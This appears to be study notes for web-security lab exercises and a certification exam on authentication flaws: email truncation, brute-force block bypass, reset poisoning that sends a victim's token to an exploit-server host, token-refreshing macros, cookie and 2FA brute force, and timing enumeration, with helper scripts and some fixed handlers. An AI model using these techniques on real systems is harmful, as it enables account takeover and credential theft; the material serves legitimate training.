Authentication
Account Registration
Using a specific mail domain
The registration check accepts an email longer than 255 characters and only afterwards truncates what it stores to 255 characters. This is the logic flaw in the account registration page: create an address with more than 200 characters before the @ symbol, chosen so that the m at the end of @dontwannacry.com is character 255 exactly. Everything after it (the mail domain you actually control) is cut off from the stored address, but the full address is where the confirmation mail goes.
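The following is an added example, not part of the original notes: it builds an address of the shape described above and shows what survives the truncation. The exploit server host is an assumption; replace it with your own.

```python
# Added example, not part of the original notes: build a registration address whose
# first 255 characters end exactly in the required domain, so that the part the server
# truncates is the mail domain you actually control.
TRUNCATE_AT = 255                         # truncation length noted above
REQUIRED_DOMAIN = "@dontwannacry.com"     # domain the registration check insists on
# Assumed attacker-controlled mail host; replace with your own exploit server host.
REAL_MAIL_HOST = "exploit-0a1b.exploit-server.net"


def build_truncated_email(limit=TRUNCATE_AT, required=REQUIRED_DOMAIN,
                          real_host=REAL_MAIL_HOST, filler="a"):
    """Return an address where the last character of `required` sits at position `limit`.

    Everything after that position (".<real_host>") is dropped by the truncation, but the
    mail server sees the full address and delivers to dontwannacry.com.<real_host>,
    a subdomain under your control.
    """
    pad = limit - len(required)
    if pad < 1:
        raise ValueError("limit too small for the required domain")
    local_part = filler * pad
    return f"{local_part}{required}.{real_host}"


def stored_value(email, limit=TRUNCATE_AT):
    """What the application keeps after truncating the submitted address."""
    return email[:limit]


if __name__ == "__main__":
    addr = build_truncated_email()
    print(len(addr.split("@")[0]), "chars before @")
    print("stored as:", stored_value(addr))
    print("mail delivered to domain:", addr.split("@", 1)[1])
```

Verify the position before submitting: the character at index 254 (1-based position 255) must be the final m of the required domain, otherwise the stored address ends in the wrong place.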
Bypass IP-based brute force block
A successful login resets the failed-attempt counter for your IP, so interleave a valid login of your own with every guess for carlos and the block never triggers. Use a Pitchfork attack in Burp Intruder with two positions (username and password).
Click Resource pool to open the Resource pool side panel, then add the attack to a resource pool with Maximum concurrent requests set to 1. Sending only one request at a time ensures that your login attempts reach the server in the correct order.
Click Payloads to open the Payloads side panel, then select position 1 from the Payload position drop-down list. Add a list of payloads that alternates between your username and carlos. Make sure that your username is first and that carlos is repeated at least 100 times.
Edit the list of candidate passwords and add your own password before each one, so that your password is aligned with your username in the other list.
Select position 2 from the Payload position drop-down list, then add the password list. Start the attack.
When the attack finishes, filter the results to hide responses with a 200 status code and sort the remaining results by username. There should be only a single 302 response for requests with the username carlos. Make a note of the password from the Payload 2 column.
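An added example, not part of the original notes, that generates the two aligned payload lists for the Pitchfork attack above and picks the successful guess out of the exported results. The account names, the password and the candidate list are constructed.

```python
# Added example, not part of the original notes: generate the two aligned payload lists
# for the Pitchfork attack described above and pick out the successful guess afterwards.
MY_USER = "wiener"          # assumed: your own valid account
MY_PASS = "peter"           # assumed: its password
TARGET_USER = "carlos"

# Constructed candidate list; in practice load the wordlist from a file.
CANDIDATES = ["123456", "password", "qwerty", "letmein", "monkey"]


def build_aligned_payloads(my_user, my_pass, target_user, candidates):
    """Position 1 alternates my_user/target_user; position 2 keeps my_pass aligned
    with my_user so every guess for target_user is preceded by a successful login."""
    users, passwords = [], []
    for cand in candidates:
        users.extend([my_user, target_user])
        passwords.extend([my_pass, cand])
    return users, passwords


def find_target_hit(results, target_user, success_status=302):
    """results: iterable of (username, password, status) rows from the finished attack.
    Return the password that produced success_status for target_user, or None if there
    is not exactly one such row."""
    hits = [pw for user, pw, status in results
            if user == target_user and status == success_status]
    return hits[0] if len(hits) == 1 else None


if __name__ == "__main__":
    users, passwords = build_aligned_payloads(MY_USER, MY_PASS, TARGET_USER, CANDIDATES)
    with open("position1.txt", "w") as f:
        f.write("\n".join(users) + "\n")
    with open("position2.txt", "w") as f:
        f.write("\n".join(passwords) + "\n")
    print(f"wrote {len(users)} aligned payloads per position")
```

Load position1.txt into payload position 1 and position2.txt into position 2; the lists are the same length by construction, which is what Pitchfork needs.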
Password reset
Send the password reset request to Burp Repeater and add the X-Forwarded-Host header with your exploit server URL:
X-Forwarded-Host: YOUR-EXPLOIT-SERVER-ID.exploit-server.net
Change the username parameter to carlos and send the request. Go to the exploit server and open the access log. You should see a GET /forgot-password request, which contains the victim's token as a query parameter. Make a note of this token. Open the password change URL with this token and set a new password for carlos.
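An added example, not code from the original notes or from the lab application: it shows why the link in the reset e-mail ends up on the exploit server, and the fix. The handler shape, the canonical host name and the token parameter name are assumptions.

```python
# Added example, not part of the original notes: how the reset link ends up pointing at
# the attacker's host, and the fix. The handler shape and host name are assumptions.
from urllib.parse import urlencode, urlunsplit

CANONICAL_HOST = "0a1b.web-security-academy.net"   # assumed: the real application host


def _header(headers, name):
    """Case-insensitive header lookup over a plain dict."""
    for k, v in headers.items():
        if k.lower() == name.lower():
            return v
    return None


def reset_link_vulnerable(headers, token):
    """Vulnerable: trusts X-Forwarded-Host (then Host) supplied by the client when
    building the link that is e-mailed to the victim."""
    host = _header(headers, "X-Forwarded-Host") or _header(headers, "Host")
    query = urlencode({"temp-forgot-password-token": token})
    return urlunsplit(("https", host, "/forgot-password", query, ""))


def reset_link_fixed(headers, token):
    """Fixed: the link host comes from server configuration, never from request headers."""
    query = urlencode({"temp-forgot-password-token": token})
    return urlunsplit(("https", CANONICAL_HOST, "/forgot-password", query, ""))


# Constructed request headers, as sent from Repeater.
POISONED_HEADERS = {
    "Host": CANONICAL_HOST,
    "X-Forwarded-Host": "YOUR-EXPLOIT-SERVER-ID.exploit-server.net",
}

if __name__ == "__main__":
    print(reset_link_vulnerable(POISONED_HEADERS, "tok123"))
    print(reset_link_fixed(POISONED_HEADERS, "tok123"))
```

When the victim clicks the vulnerable link, the GET with the token lands on the exploit server and appears in its access log, which is the request the notes above tell you to look for.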
Auth token bypass macro
If the login is protected against brute force by a random token that must be submitted with every login POST, a Burp macro can fetch a fresh token before each request and bypass the protection.
Create the Burp macro
Open Settings and select Sessions under Project.
Scroll down to Macros and add a new macro. Select the request whose response carries the token (the GET for the login page) from the list.
Click Configure item and add a custom parameter location that extracts the token from the response. Click OK to return to Sessions under Project.
Add a Session handling rule; the rule editor dialogue opens. Under Rule actions add Run a macro, pick the macro you just created, and have it update the token parameter in the current request with the extracted value.
In the dialogue, go to the Scope tab. Under Tools scope, check Target, Intruder, and Repeater.
Still under URL scope, select Include all URLs. Close Settings.
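The scripted equivalent of the macro, added here as an example and not part of the original notes: parse the token out of the login page and submit it with each guess. The field name csrf and the login page below are constructed assumptions.

```python
# Added example, not part of the original notes: the scripted equivalent of the macro.
# Fetch the login page, pull the per-request token out of the form, and submit it with
# each guess. The field name "csrf" and the page layout below are assumptions.
from html.parser import HTMLParser
from urllib.parse import urlencode


class _HiddenInputs(HTMLParser):
    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = dict(attrs)
        if (a.get("type") or "").lower() == "hidden" and a.get("name"):
            self.fields[a["name"]] = a.get("value") or ""


def extract_hidden_fields(html):
    """Return {name: value} for every hidden input on the page (the macro's custom
    parameter location, done by parsing instead of start/end delimiters)."""
    p = _HiddenInputs()
    p.feed(html)
    return p.fields


def build_login_body(login_page_html, username, password, token_field="csrf"):
    """Assemble the POST body for one attempt, carrying the fresh token."""
    fields = extract_hidden_fields(login_page_html)
    if token_field not in fields:
        raise ValueError(f"no {token_field} token on login page")
    return urlencode({token_field: fields[token_field],
                      "username": username, "password": password})


# Constructed login page, standing in for the GET /login response.
SAMPLE_LOGIN_PAGE = """
<form method="POST" action="/login">
  <input required type="hidden" name="csrf" value="Ab3dEf9gHiJ">
  <input type="text" name="username">
  <input type="password" name="password">
</form>
"""

if __name__ == "__main__":
    # Real run: fetch GET /login in a session, then POST build_login_body(page, user, guess)
    # for every guess, fetching the page again before each POST so the token is fresh.
    print(build_login_body(SAMPLE_LOGIN_PAGE, "carlos", "guess1"))
```

The GET-then-POST pairing per guess is exactly what the session handling rule does for Intruder; doing it in a script is useful when the token is also tied to the session cookie and you want to control both.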
Brute Force
Stay-logged-in cookie brute force
Log out as the current user.
Send the most recent GET /my-account request to Burp Intruder.
Select the value of the stay-logged-in cookie as the injection position and add payload processing rules in this order:
Hash: MD5
Add prefix: carlos:
Encode: Base64-encode
Under the Settings tab add a Grep - Match rule for the string Update email; it only appears on the my-account page and so marks the request that logged in successfully.
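An added example, not part of the original notes, that reproduces the payload processing chain above locally so a captured cookie can be decoded and candidate cookies generated without Intruder. The wordlist is constructed.

```python
# Added example, not part of the original notes: reproduce Intruder's payload processing
# chain (MD5 -> prefix "carlos:" -> Base64) so the cookie can be generated and decoded
# locally. Wordlist entries below are constructed.
import base64
import hashlib

TARGET_USER = "carlos"


def make_stay_logged_in(username, password):
    """base64(username + ":" + md5hex(password)), the format the cookie turned out to use."""
    digest = hashlib.md5(password.encode()).hexdigest()
    return base64.b64encode(f"{username}:{digest}".encode()).decode()


def decode_stay_logged_in(cookie):
    """Split a captured cookie back into (username, md5hex); use this first to confirm
    the format before spending requests on a brute force."""
    raw = base64.b64decode(cookie).decode()
    user, _, digest = raw.partition(":")
    return user, digest


def candidate_cookies(username, wordlist):
    """The Intruder payload list as it is sent: one cookie value per candidate password."""
    return {pw: make_stay_logged_in(username, pw) for pw in wordlist}


if __name__ == "__main__":
    for pw, ck in candidate_cookies(TARGET_USER, ["123456", "password", "qwerty"]).items():
        # in the real attack: send GET /my-account with Cookie: stay-logged-in=<ck>
        # and grep the response for "Update email"
        print(pw, ck)
```

Because the cookie is derived only from the username and an unsalted MD5 of the password, every candidate can be computed offline; the server is needed only to confirm which one logs in.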
New password error flow
Notice the behaviour when you enter the wrong current password. If the two entries for the new password match, the account is locked. However, if you enter two different new passwords, an error message simply states Current password is incorrect. If you enter a valid current password but two different new passwords, the message says New passwords do not match. The mismatch therefore acts as an oracle for the current password without ever triggering the lockout.
Enter your correct current password and two new passwords that do not match. Send this POST /my-account/change-password request to Burp Intruder. In Burp Intruder, change the username parameter to carlos and add a payload position to the current-password parameter. Make sure that the new password parameters are set to two different values. For example:
username=carlos&current-password=§incorrect-password§&new-password-1=123&new-password-2=abc
In the Payloads side panel, enter the list of passwords as the payload set. The one response that says New passwords do not match identifies carlos's current password.
Response time enumeration for credentials
Use Intruder to brute force the username with a very long password: if the response takes noticeably longer, the user exists (the password is only hashed and compared for a real account).
Then use Intruder again to attack the password for that username.
If your IP gets blocked, use a second payload position in an X-Forwarded-For header so each request appears to come from a different address.
Brute force: different response
Identify that the login page and password reset are not protected against brute force attacks: no IP block or time-out is enforced for invalid usernames or passwords.
Tip for the BSCP exam: there is sometimes another user with a weak password that can be brute forced. Carlos is not always the account to target for foothold access in stage 1.
In the Intruder attack results, look at the column for the Grep value Invalid username or password. One failed-login response does not contain the full stop at the end of the message. Repeat the attack with this identified username and Sniper the password field to find the 302 response of a valid login.
Another way to identify a valid username on the web app is to supply a list of usernames on the login with one invalid password value. In the Intruder attack results one response will contain the message Incorrect password.
Intruder attack injection position: username=§invalid-username§&password=SomeStupidLongCrazyWrongSecretPassword123456789
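The three signals used above (a message that differs from the rest even by a trailing full stop, a slower response, a different status code) and the current-password oracle from the change-password flow all come down to finding the odd row in a finished attack. This added example, not part of the original notes, does that over a constructed result table; real rows come from exporting the Intruder attack table.

```python
# Added example, not part of the original notes: sort a finished Intruder run by the
# signals the notes rely on, i.e. a response whose message differs from the rest (even by
# a trailing full stop), one that is noticeably slower, or one with a different status.
# The result rows below are constructed; real ones come from exporting the attack table.
from collections import Counter
from statistics import median

# (payload, status, response_time_ms, message)
SAMPLE_RESULTS = [
    ("wiener", 200, 121, "Invalid username or password."),
    ("admin",  200, 118, "Invalid username or password."),
    ("albert", 200, 944, "Invalid username or password"),   # no trailing period, and slow
    ("peter",  200, 125, "Invalid username or password."),
    ("root",   200, 119, "Invalid username or password."),
]


def outliers_by_message(results):
    """Payloads whose message text is unique across the run (exact match, punctuation
    included); catches the missing full stop and the 'Incorrect password' /
    'New passwords do not match' cases alike."""
    counts = Counter(msg for _, _, _, msg in results)
    return [payload for payload, _, _, msg in results if counts[msg] == 1]


def outliers_by_time(results, factor=3.0):
    """Payloads that took more than factor x the median time: a long password that is
    hashed only for an existing username shows up here."""
    med = median(t for _, _, t, _ in results)
    return [payload for payload, _, t, _ in results if t > factor * med]


def outliers_by_status(results, status=302):
    """Payloads that drew a different status, e.g. the redirect after a valid login."""
    return [payload for payload, st, _, _ in results if st == status]


if __name__ == "__main__":
    print("message:", outliers_by_message(SAMPLE_RESULTS))
    print("timing: ", outliers_by_time(SAMPLE_RESULTS))
    print("status: ", outliers_by_status(SAMPLE_RESULTS))
```

Run the timing check on a resource pool with one concurrent request, as in the IP-block bypass above, otherwise queueing on the server side masks the difference.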
2FA bypass
Change the verify parameter value to the username we want the code generated for, then request a code.
In Intruder, take the POST /login2 request, set the verify parameter to that username, and brute force the 2FA code.
Password Reset
The password reset functionality still works even if you delete the value of the temp-forgot-password-token parameter in both the URL and the request body.
If you remove the current-password parameter entirely, you are able to change your password without providing your current one.
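Both findings above are the same bug shape: a check that only runs when the parameter is present or non-empty. This added example (not the lab's code or the original notes) puts the vulnerable handler next to the fixed one; the in-memory store, token value and account names are constructed, and parameter names follow the request bodies quoted above.

```python
# Added example, not part of the original notes: the two checks the notes show being
# skipped, written as a vulnerable handler beside the fixed one. Stores are in-memory
# dicts and parameter names follow the request bodies quoted above.
import hmac


def new_store():
    """Constructed application state: issued reset tokens and current passwords."""
    return {"tokens": {"carlos": "a1b2c3"},
            "passwords": {"carlos": "old", "wiener": "peter"}}


def reset_password_vulnerable(store, params):
    """Bug: an empty temp-forgot-password-token is treated as 'nothing to check'."""
    user = params.get("username")
    token = params.get("temp-forgot-password-token", "")
    if token and token != store["tokens"].get(user):
        return False
    store["passwords"][user] = params["new-password-1"]
    return True


def reset_password_fixed(store, params):
    """Token must be present, must match in constant time, and is single use."""
    user = params.get("username")
    token = params.get("temp-forgot-password-token", "")
    expected = store["tokens"].get(user)
    if not token or expected is None or not hmac.compare_digest(token, expected):
        return False
    if params.get("new-password-1") != params.get("new-password-2"):
        return False
    del store["tokens"][user]
    store["passwords"][user] = params["new-password-1"]
    return True


def change_password_vulnerable(store, params):
    """Bug: the current password is verified only when the parameter is present."""
    user = params["username"]
    current = params.get("current-password")
    if current is not None and current != store["passwords"][user]:
        return False
    store["passwords"][user] = params["new-password-1"]
    return True


def change_password_fixed(store, params):
    """Missing current-password is a failure, not a pass."""
    user = params["username"]
    current = params.get("current-password")
    if current is None or not hmac.compare_digest(current, store["passwords"][user]):
        return False
    if params.get("new-password-1") != params.get("new-password-2"):
        return False
    store["passwords"][user] = params["new-password-1"]
    return True


if __name__ == "__main__":
    s = new_store()
    print("empty token accepted by vulnerable reset:",
          reset_password_vulnerable(s, {"username": "carlos",
                                        "temp-forgot-password-token": "",
                                        "new-password-1": "pwned", "new-password-2": "pwned"}))
    s = new_store()
    print("missing current-password accepted by vulnerable change:",
          change_password_vulnerable(s, {"username": "carlos",
                                         "new-password-1": "x", "new-password-2": "x"}))
```

When testing a reset or change-password flow, try each of the three variants in Repeater: parameter removed, parameter present but empty, and parameter with a wrong value. A handler that behaves differently across them is treating absence as success.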